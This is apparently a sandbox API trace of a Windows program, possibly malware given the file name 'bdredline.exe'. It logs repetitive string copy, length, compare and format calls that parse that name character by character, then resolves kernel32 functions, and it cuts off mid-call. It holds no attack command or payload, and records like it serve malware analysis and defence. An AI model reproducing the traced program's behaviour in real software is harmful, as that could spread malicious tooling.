[0158.382] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.382] lstrcpynA (in: lpString1=0x432000, lpString2="dredline.exe,", iMaxLength=1024 | out: lpString1="dredline.exe,") returned="dredline.exe," [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.382] lstrlenA (lpString="0") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40ac18, lpString2="d0", iMaxLength=1024 | out: lpString1="d0") returned="d0" [0158.382] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.382] lstrcmpiA (lpString1="d0", lpString2="0") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40a418, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.382] lstrlenA (lpString="1") returned 1 [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrlenA (lpString="d") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40ac18, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.382] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.382] lstrlenA (lpString=",") returned 1 [0158.382] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.382] lstrcmpiA (lpString1="d", lpString2=",") returned 1 [0158.383] 
lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.383] lstrlenA (lpString="1") returned 1 [0158.383] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="2") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.383] lstrlenA (lpString="1") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="2", iMaxLength=1024 | out: lpString1="2") returned="2" [0158.383] lstrlenA (lpString="2") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.383] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.383] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.383] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.383] lstrcpynA (in: lpString1=0x432000, lpString2="redline.exe,", iMaxLength=1024 | out: lpString1="redline.exe,") returned="redline.exe," [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.383] lstrlenA (lpString="r") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.383] lstrlenA (lpString="0") returned 1 [0158.383] lstrcpynA (in: lpString1=0x40ac18, lpString2="r0", iMaxLength=1024 | out: lpString1="r0") returned="r0" [0158.383] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.383] lstrcmpiA (lpString1="r0", lpString2="0") returned 1 [0158.383] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.383] lstrlenA (lpString="r") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" 
[0158.384] lstrlenA (lpString="r") returned 1 [0158.384] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.384] lstrlenA (lpString="r") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="r", iMaxLength=1024 | out: lpString1="r") returned="r" [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrlenA (lpString=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrcmpiA (lpString1="r", lpString2=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="2", iMaxLength=1024 | out: lpString1="2") returned="2" [0158.384] lstrlenA (lpString="2") returned 1 [0158.384] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="3") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3", iMaxLength=1024 | out: lpString1="3") returned="3" [0158.384] lstrlenA (lpString="3") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.384] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.384] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.384] lstrcpynA (in: lpString1=0x432000, lpString2="edline.exe,", iMaxLength=1024 | out: lpString1="edline.exe,") 
returned="edline.exe," [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.384] lstrlenA (lpString="0") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="e0", iMaxLength=1024 | out: lpString1="e0") returned="e0" [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.384] lstrcmpiA (lpString1="e0", lpString2="0") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40a418, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.384] lstrlenA (lpString="1") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrlenA (lpString="e") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40ac18, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrlenA (lpString=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.384] lstrcmpiA (lpString1="e", lpString2=",") returned 1 [0158.384] lstrcpynA (in: lpString1=0x42e3a0, lpString2="3", iMaxLength=1024 | out: lpString1="3") returned="3" [0158.384] lstrlenA (lpString="3") returned 1 [0158.385] wsprintfA (in: param_1=0x431800, 
param_2="%d" | out: param_1="4") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.385] lstrlenA (lpString="4") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x432000, lpString2="dline.exe,", iMaxLength=1024 | out: lpString1="dline.exe,") returned="dline.exe," [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrlenA (lpString="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, lpString2="d0", iMaxLength=1024 | out: lpString1="d0") returned="d0" [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrcmpiA (lpString1="d0", lpString2="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", 
iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrlenA (lpString="d") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, lpString2="d", iMaxLength=1024 | out: lpString1="d") returned="d" [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.385] lstrlenA (lpString=",") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.385] lstrcmpiA (lpString1="d", lpString2=",") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="4", iMaxLength=1024 | out: lpString1="4") returned="4" [0158.385] lstrlenA (lpString="4") returned 1 [0158.385] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="5") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.385] lstrlenA (lpString="1") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5", iMaxLength=1024 | out: lpString1="5") returned="5" [0158.385] lstrlenA (lpString="5") returned 1 [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.385] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.385] lstrcpynA (in: lpString1=0x432000, lpString2="line.exe,", iMaxLength=1024 | out: lpString1="line.exe,") returned="line.exe," [0158.385] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.385] lstrlenA (lpString="l") returned 1 [0158.385] lstrcpynA 
(in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.385] lstrlenA (lpString="0") returned 1 [0158.385] lstrcpynA (in: lpString1=0x40ac18, lpString2="l0", iMaxLength=1024 | out: lpString1="l0") returned="l0" [0158.385] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrcmpiA (lpString1="l0", lpString2="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.386] lstrlenA (lpString="1") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrlenA (lpString="l") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40ac18, lpString2="l", iMaxLength=1024 | out: lpString1="l") returned="l" [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.386] lstrlenA (lpString=",") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.386] lstrcmpiA (lpString1="l", lpString2=",") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="5", iMaxLength=1024 | out: lpString1="5") returned="5" [0158.386] lstrlenA (lpString="5") returned 1 [0158.386] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="6") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.386] lstrlenA (lpString="1") returned 1 
[0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="6", iMaxLength=1024 | out: lpString1="6") returned="6" [0158.386] lstrlenA (lpString="6") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.386] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.386] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.386] lstrcpynA (in: lpString1=0x432000, lpString2="ine.exe,", iMaxLength=1024 | out: lpString1="ine.exe,") returned="ine.exe," [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.386] lstrlenA (lpString="i") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrlenA (lpString="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40ac18, lpString2="i0", iMaxLength=1024 | out: lpString1="i0") returned="i0" [0158.386] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.386] lstrcmpiA (lpString1="i0", lpString2="0") returned 1 [0158.386] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.386] lstrlenA (lpString="i") returned 1 [0158.386] lstrcpynA (in: lpString1=0x40a418, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.387] lstrlenA (lpString="i") returned 1 [0158.387] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" 
[0158.387] lstrlenA (lpString="i") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="i", iMaxLength=1024 | out: lpString1="i") returned="i" [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrlenA (lpString=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrcmpiA (lpString1="i", lpString2=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="6", iMaxLength=1024 | out: lpString1="6") returned="6" [0158.387] lstrlenA (lpString="6") returned 1 [0158.387] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="7") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="7", iMaxLength=1024 | out: lpString1="7") returned="7" [0158.387] lstrlenA (lpString="7") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.387] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.387] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.387] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.387] lstrcpynA (in: lpString1=0x432000, lpString2="ne.exe,", iMaxLength=1024 | out: lpString1="ne.exe,") returned="ne.exe," [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.387] lstrlenA (lpString="0") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="n0", iMaxLength=1024 
| out: lpString1="n0") returned="n0" [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.387] lstrcmpiA (lpString1="n0", lpString2="0") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40a418, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.387] lstrlenA (lpString="1") returned 1 [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrlenA (lpString="n") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40ac18, lpString2="n", iMaxLength=1024 | out: lpString1="n") returned="n" [0158.387] lstrcpynA (in: lpString1=0x42e3a0, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.387] lstrlenA (lpString=",") returned 1 [0158.387] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrcmpiA (lpString1="n", lpString2=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="7", iMaxLength=1024 | out: lpString1="7") returned="7" [0158.388] lstrlenA (lpString="7") returned 1 [0158.388] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="8") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="8", iMaxLength=1024 | out: lpString1="8") returned="8" [0158.388] lstrlenA (lpString="8") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x432000, lpString2="e.exe,", iMaxLength=1024 | out: lpString1="e.exe,") returned="e.exe," [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.388] lstrlenA (lpString="0") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40ac18, lpString2="e0", iMaxLength=1024 | out: lpString1="e0") returned="e0" [0158.388] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.388] lstrcmpiA (lpString1="e0", lpString2="0") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrlenA (lpString="e") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40ac18, lpString2="e", iMaxLength=1024 | out: lpString1="e") returned="e" [0158.388] lstrcpynA (in: lpString1=0x42e3a0, 
lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrlenA (lpString=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x40b018, lpString2=",", iMaxLength=1024 | out: lpString1=",") returned="," [0158.388] lstrcmpiA (lpString1="e", lpString2=",") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="8", iMaxLength=1024 | out: lpString1="8") returned="8" [0158.388] lstrlenA (lpString="8") returned 1 [0158.388] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="9") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="1", iMaxLength=1024 | out: lpString1="1") returned="1" [0158.388] lstrlenA (lpString="1") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="9", iMaxLength=1024 | out: lpString1="9") returned="9" [0158.388] lstrlenA (lpString="9") returned 1 [0158.388] lstrcpynA (in: lpString1=0x42e3a0, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.388] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.388] lstrcpynA (in: lpString1=0x40a418, lpString2="bdredline.exe,", iMaxLength=1024 | out: lpString1="bdredline.exe,") returned="bdredline.exe," [0158.389] lstrlenA (lpString="bdredline.exe,") returned 14 [0158.389] lstrcpynA (in: lpString1=0x432000, lpString2=".exe,", iMaxLength=1024 | out: lpString1=".exe,") returned=".exe," [0158.389] lstrcpynA (in: lpString1=0x42e3a0, lpString2=".", iMaxLength=1024 | out: lpString1=".") returned="." 
[0158.389] lstrlenA (lpString=".") returned 1 [0158.389] lstrcpynA (in: lpString1=0x42e3a1, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.389] lstrlenA (lpString="0") returned 1 [0158.389] lstrcpynA (in: lpString1=0x40ac18, lpString2=".0", iMaxLength=1024 | out: lpString1=".0") returned=".0" [0158.389] lstrcpynA (in: lpString1=0x40b018, lpString2="0", iMaxLength=1024 | out: lpString1="0") returned="0" [0158.389] lstrcmpiA (lpString1=".0", lpString2="0") returned -1 [0158.389] lstrcpynA (in: lpString1=0x42e3a0, lpString2=".", iMaxLength=1024 | out: lpString1=".") returned="." [0158.389] lstrlenA (lpString=".") returned 1 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="10") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="11") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="12") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="13") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x431000, param_2="%d" | out: param_1="1") returned 1 [0158.389] wsprintfA (in: param_1=0x432000, param_2="%d" | out: param_1="13") returned 2 [0158.389] wsprintfA (in: param_1=0x431800, param_2="%d" | out: param_1="14") returned 2 [0158.389] wsprintfA (in: param_1=0x433000, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x430c00, param_2="%d" | out: param_1="3297712") returned 7 [0158.390] lstrcpyA (in: lpString1=0x33e508, lpString2="3297712" | out: lpString1="3297712") 
returned="3297712" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="4") returned 1 [0158.390] lstrcpyA (in: lpString1=0x431800, lpString2="4" | out: lpString1="4") returned="4" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3303080") returned 7 [0158.390] lstrcpyA (in: lpString1=0x430800, lpString2="3303080" | out: lpString1="3303080") returned="3303080" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="5384") returned 4 [0158.390] lstrcpyA (in: lpString1=0x431000, lpString2="5384" | out: lpString1="5384") returned="5384" [0158.390] wsprintfA (in: param_1=0x3401e0, param_2="%d" | out: param_1="3297712") returned 7 [0158.390] lstrcpyA (in: lpString1=0x340df8, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.390] lstrcpyA (in: lpString1=0x33e108, lpString2="kernel32" | out: lpString1="kernel32") returned="kernel32" [0158.390] lstrcpyA (in: lpString1=0x33e508, lpString2="WideCharToMultiByte" | out: lpString1="WideCharToMultiByte") returned="WideCharToMultiByte" [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, param_2="%d" | out: param_1="0") returned 1 [0158.390] wsprintfA (in: param_1=0x3405e8, 
